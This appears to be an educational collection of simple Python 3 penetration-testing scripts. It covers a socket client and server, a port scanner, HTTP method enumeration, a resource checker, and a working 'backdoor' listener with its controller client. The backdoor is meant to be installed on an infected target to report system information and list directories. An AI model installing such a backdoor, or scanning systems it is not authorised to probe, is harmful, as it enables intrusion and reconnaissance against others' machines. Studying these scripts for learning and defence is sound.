Table of Content

  1. Client & Server
  2. Port Scanner
  3. Backdoor
  4. Enum HTTP Methods
  5. Check HTTP Resource
  6. Check Vulnerabilities by Service Banner
DISCLAIMER: all the code below are written for python3.

Client & Server

Base client-server architecture

Client

Get 


import socket

SRV_ADDR = input("Type the server IP address: ")
SRV_PORT = int(input("Type the server port: "))

print("Listening on {}:{}".format(SRV_ADDR, SRV_PORT))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((SRV_ADDR, SRV_PORT))
print("Connection enstablished...")

message = input("Message to send: ")
s.sendall(message.encode())
s.close()

Server

Get 


import socket

SRV_ADDR = input("Type the server IP address: ")
SRV_PORT = int(input("Type the server port: "))

print("Listening on {}:{}".format(SRV_ADDR, SRV_PORT))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((SRV_ADDR, SRV_PORT))
s.listen(1)

print("Server started! Waiting for connections...")
connection, address = s.accept()
print("Client connected with address: ", address)

while 1:
    data = connection.recv(1024)
    if not data: break
    print(data.decode('utf-8'))
connection.close()

Port Scanner

A simple port scanner (Get) 


import socket

common_services = {
    21: 'FTP',
    ...
}

target = input("Enter the IP address to scan: ")
portrange = input("Enter the port range to scan (es 5-200): ")

lowport = int(portrange.split('-')[0])
highport = int(portrange.split('-')[1])

print("Scanning host {} from port {} to port {}".format(target, lowport, highport))

for port in range(lowport, highport):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    status = s.connect_ex((target, port))
    if status == 0:
        common_text = ""
        if int(port) in common_services.keys():
            common_text = " - Default protocol: {}".format(common_services[int(port)])
        print("Port {} is OPEN{}".format(port, common_text))
    s.close()

Backdoor

Simple example of how to send commands to an infected machine and retrieve system informations

Server (to install on the target)

Get 


import socket, platform, os

SRV_ADDR = ""
SRV_PORT = 6666

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((SRV_ADDR, SRV_PORT))
s.listen(1)
connection, address = s.accept()
while 1:
    try:
        data = connection.recv(1024)
    except: continue

    if data.decode('utf-8') == '1':
        tosend = platform.platform() + " " + platform.machine()
        connection.sendall(tosend.encode())
    elif data.decode('utf-8') == '2':
        data = connection.recv(1024)
        try:
            filelist = os.listdir(data.decode('utf-8'))
            tosend = ""
            for x in filelist:
                tosend += "," + x
        except:
            tosend = "Wrong path"
        connection.sendall(tosend.encode())
    elif data.decode('utf-8') == '0':
        connection.close()
        connection, address = s.accept()

Client

Get 


import socket

SRV_ADDR = input("Type the server IP address: ")
SRV_PORT = int(input("Type the server port: "))

def print_menu():
    print("""\n\n
    1) Get System info
    2) List directory contents
    0) Close the connection
    """)

my_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
my_sock.connect((SRV_ADDR, SRV_PORT))

print("Connection enstablished")
print_menu()

while 1:
    message = input("\nSelect and option: ")

    if message == "0":
        my_sock.sendall(message.encode())
        my_sock.close()
        break

    elif message == "1":
        my_sock.sendall(message.encode())
        data = my_sock.recv(1024)
        if not data: break
        print("OS: ", data.decode('utf-8'))

    elif message == "2":
        path = input("Insert the path: ")
        my_sock.sendall(message.encode())
        my_sock.sendall(path.encode())
        data = my_sock.recv(1024)
        data = data.decode('utf-8').split(",")
        print("*"*40)
        for x in data:
            print(x)
        print("*"*40)

    print_menu()

Enum HTTP Methods

A simple program that returns a list of methods if OPTIONS is enabled (Get) 


import http.client

print("** This program returns a list of methods if OPTIONS is enabled **\n")

host = input("Insert the host/IP: ")
port = input("Insert the port(default:80): ")
if port == "":
    port = 80

try:
    connection = http.client.HTTPConnection(host, port)
    connection.request('OPTIONS', '/')
    response = connection.getresponse()
    print("Enabled methods are: ", response.getheader('allow'))
    connection.close()
except ConnectionRefusedError:
    print("Connection failed")

Check HTTP Resource

A simple program that checks if a specific resource is available on the webserver (Get) 


import http.client

print("** This program checks if a specific resource is available on the webserver **\n")

host = input("Insert the host/IP: ")
port = input("Insert the port(default:80): ")
url = input("Insert the url: ")

if port == "":
    port = 80

try:
    connection = http.client.HTTPConnection(host, port)
    connection.request('GET', url)
    response = connection.getresponse()
    if response.status == 200:
        print("Resource FOUND on the server ({})".format(response.status))
    elif response.status == 404:
        print("Resource NOT FOUND on the server ({})".format(response.status))
    elif response.status == 403:
        print("Access to the resource FORBIDDEN ({})".format(response.status))
    connection.close()
except ConnectionRefusedError:
    print("Connection failed")

Check Vulnerabilities by Service Banner

A simple program that checks for known service vulnerabilities analyzing the banner that they report (Get) 


... too much code, see script directly ...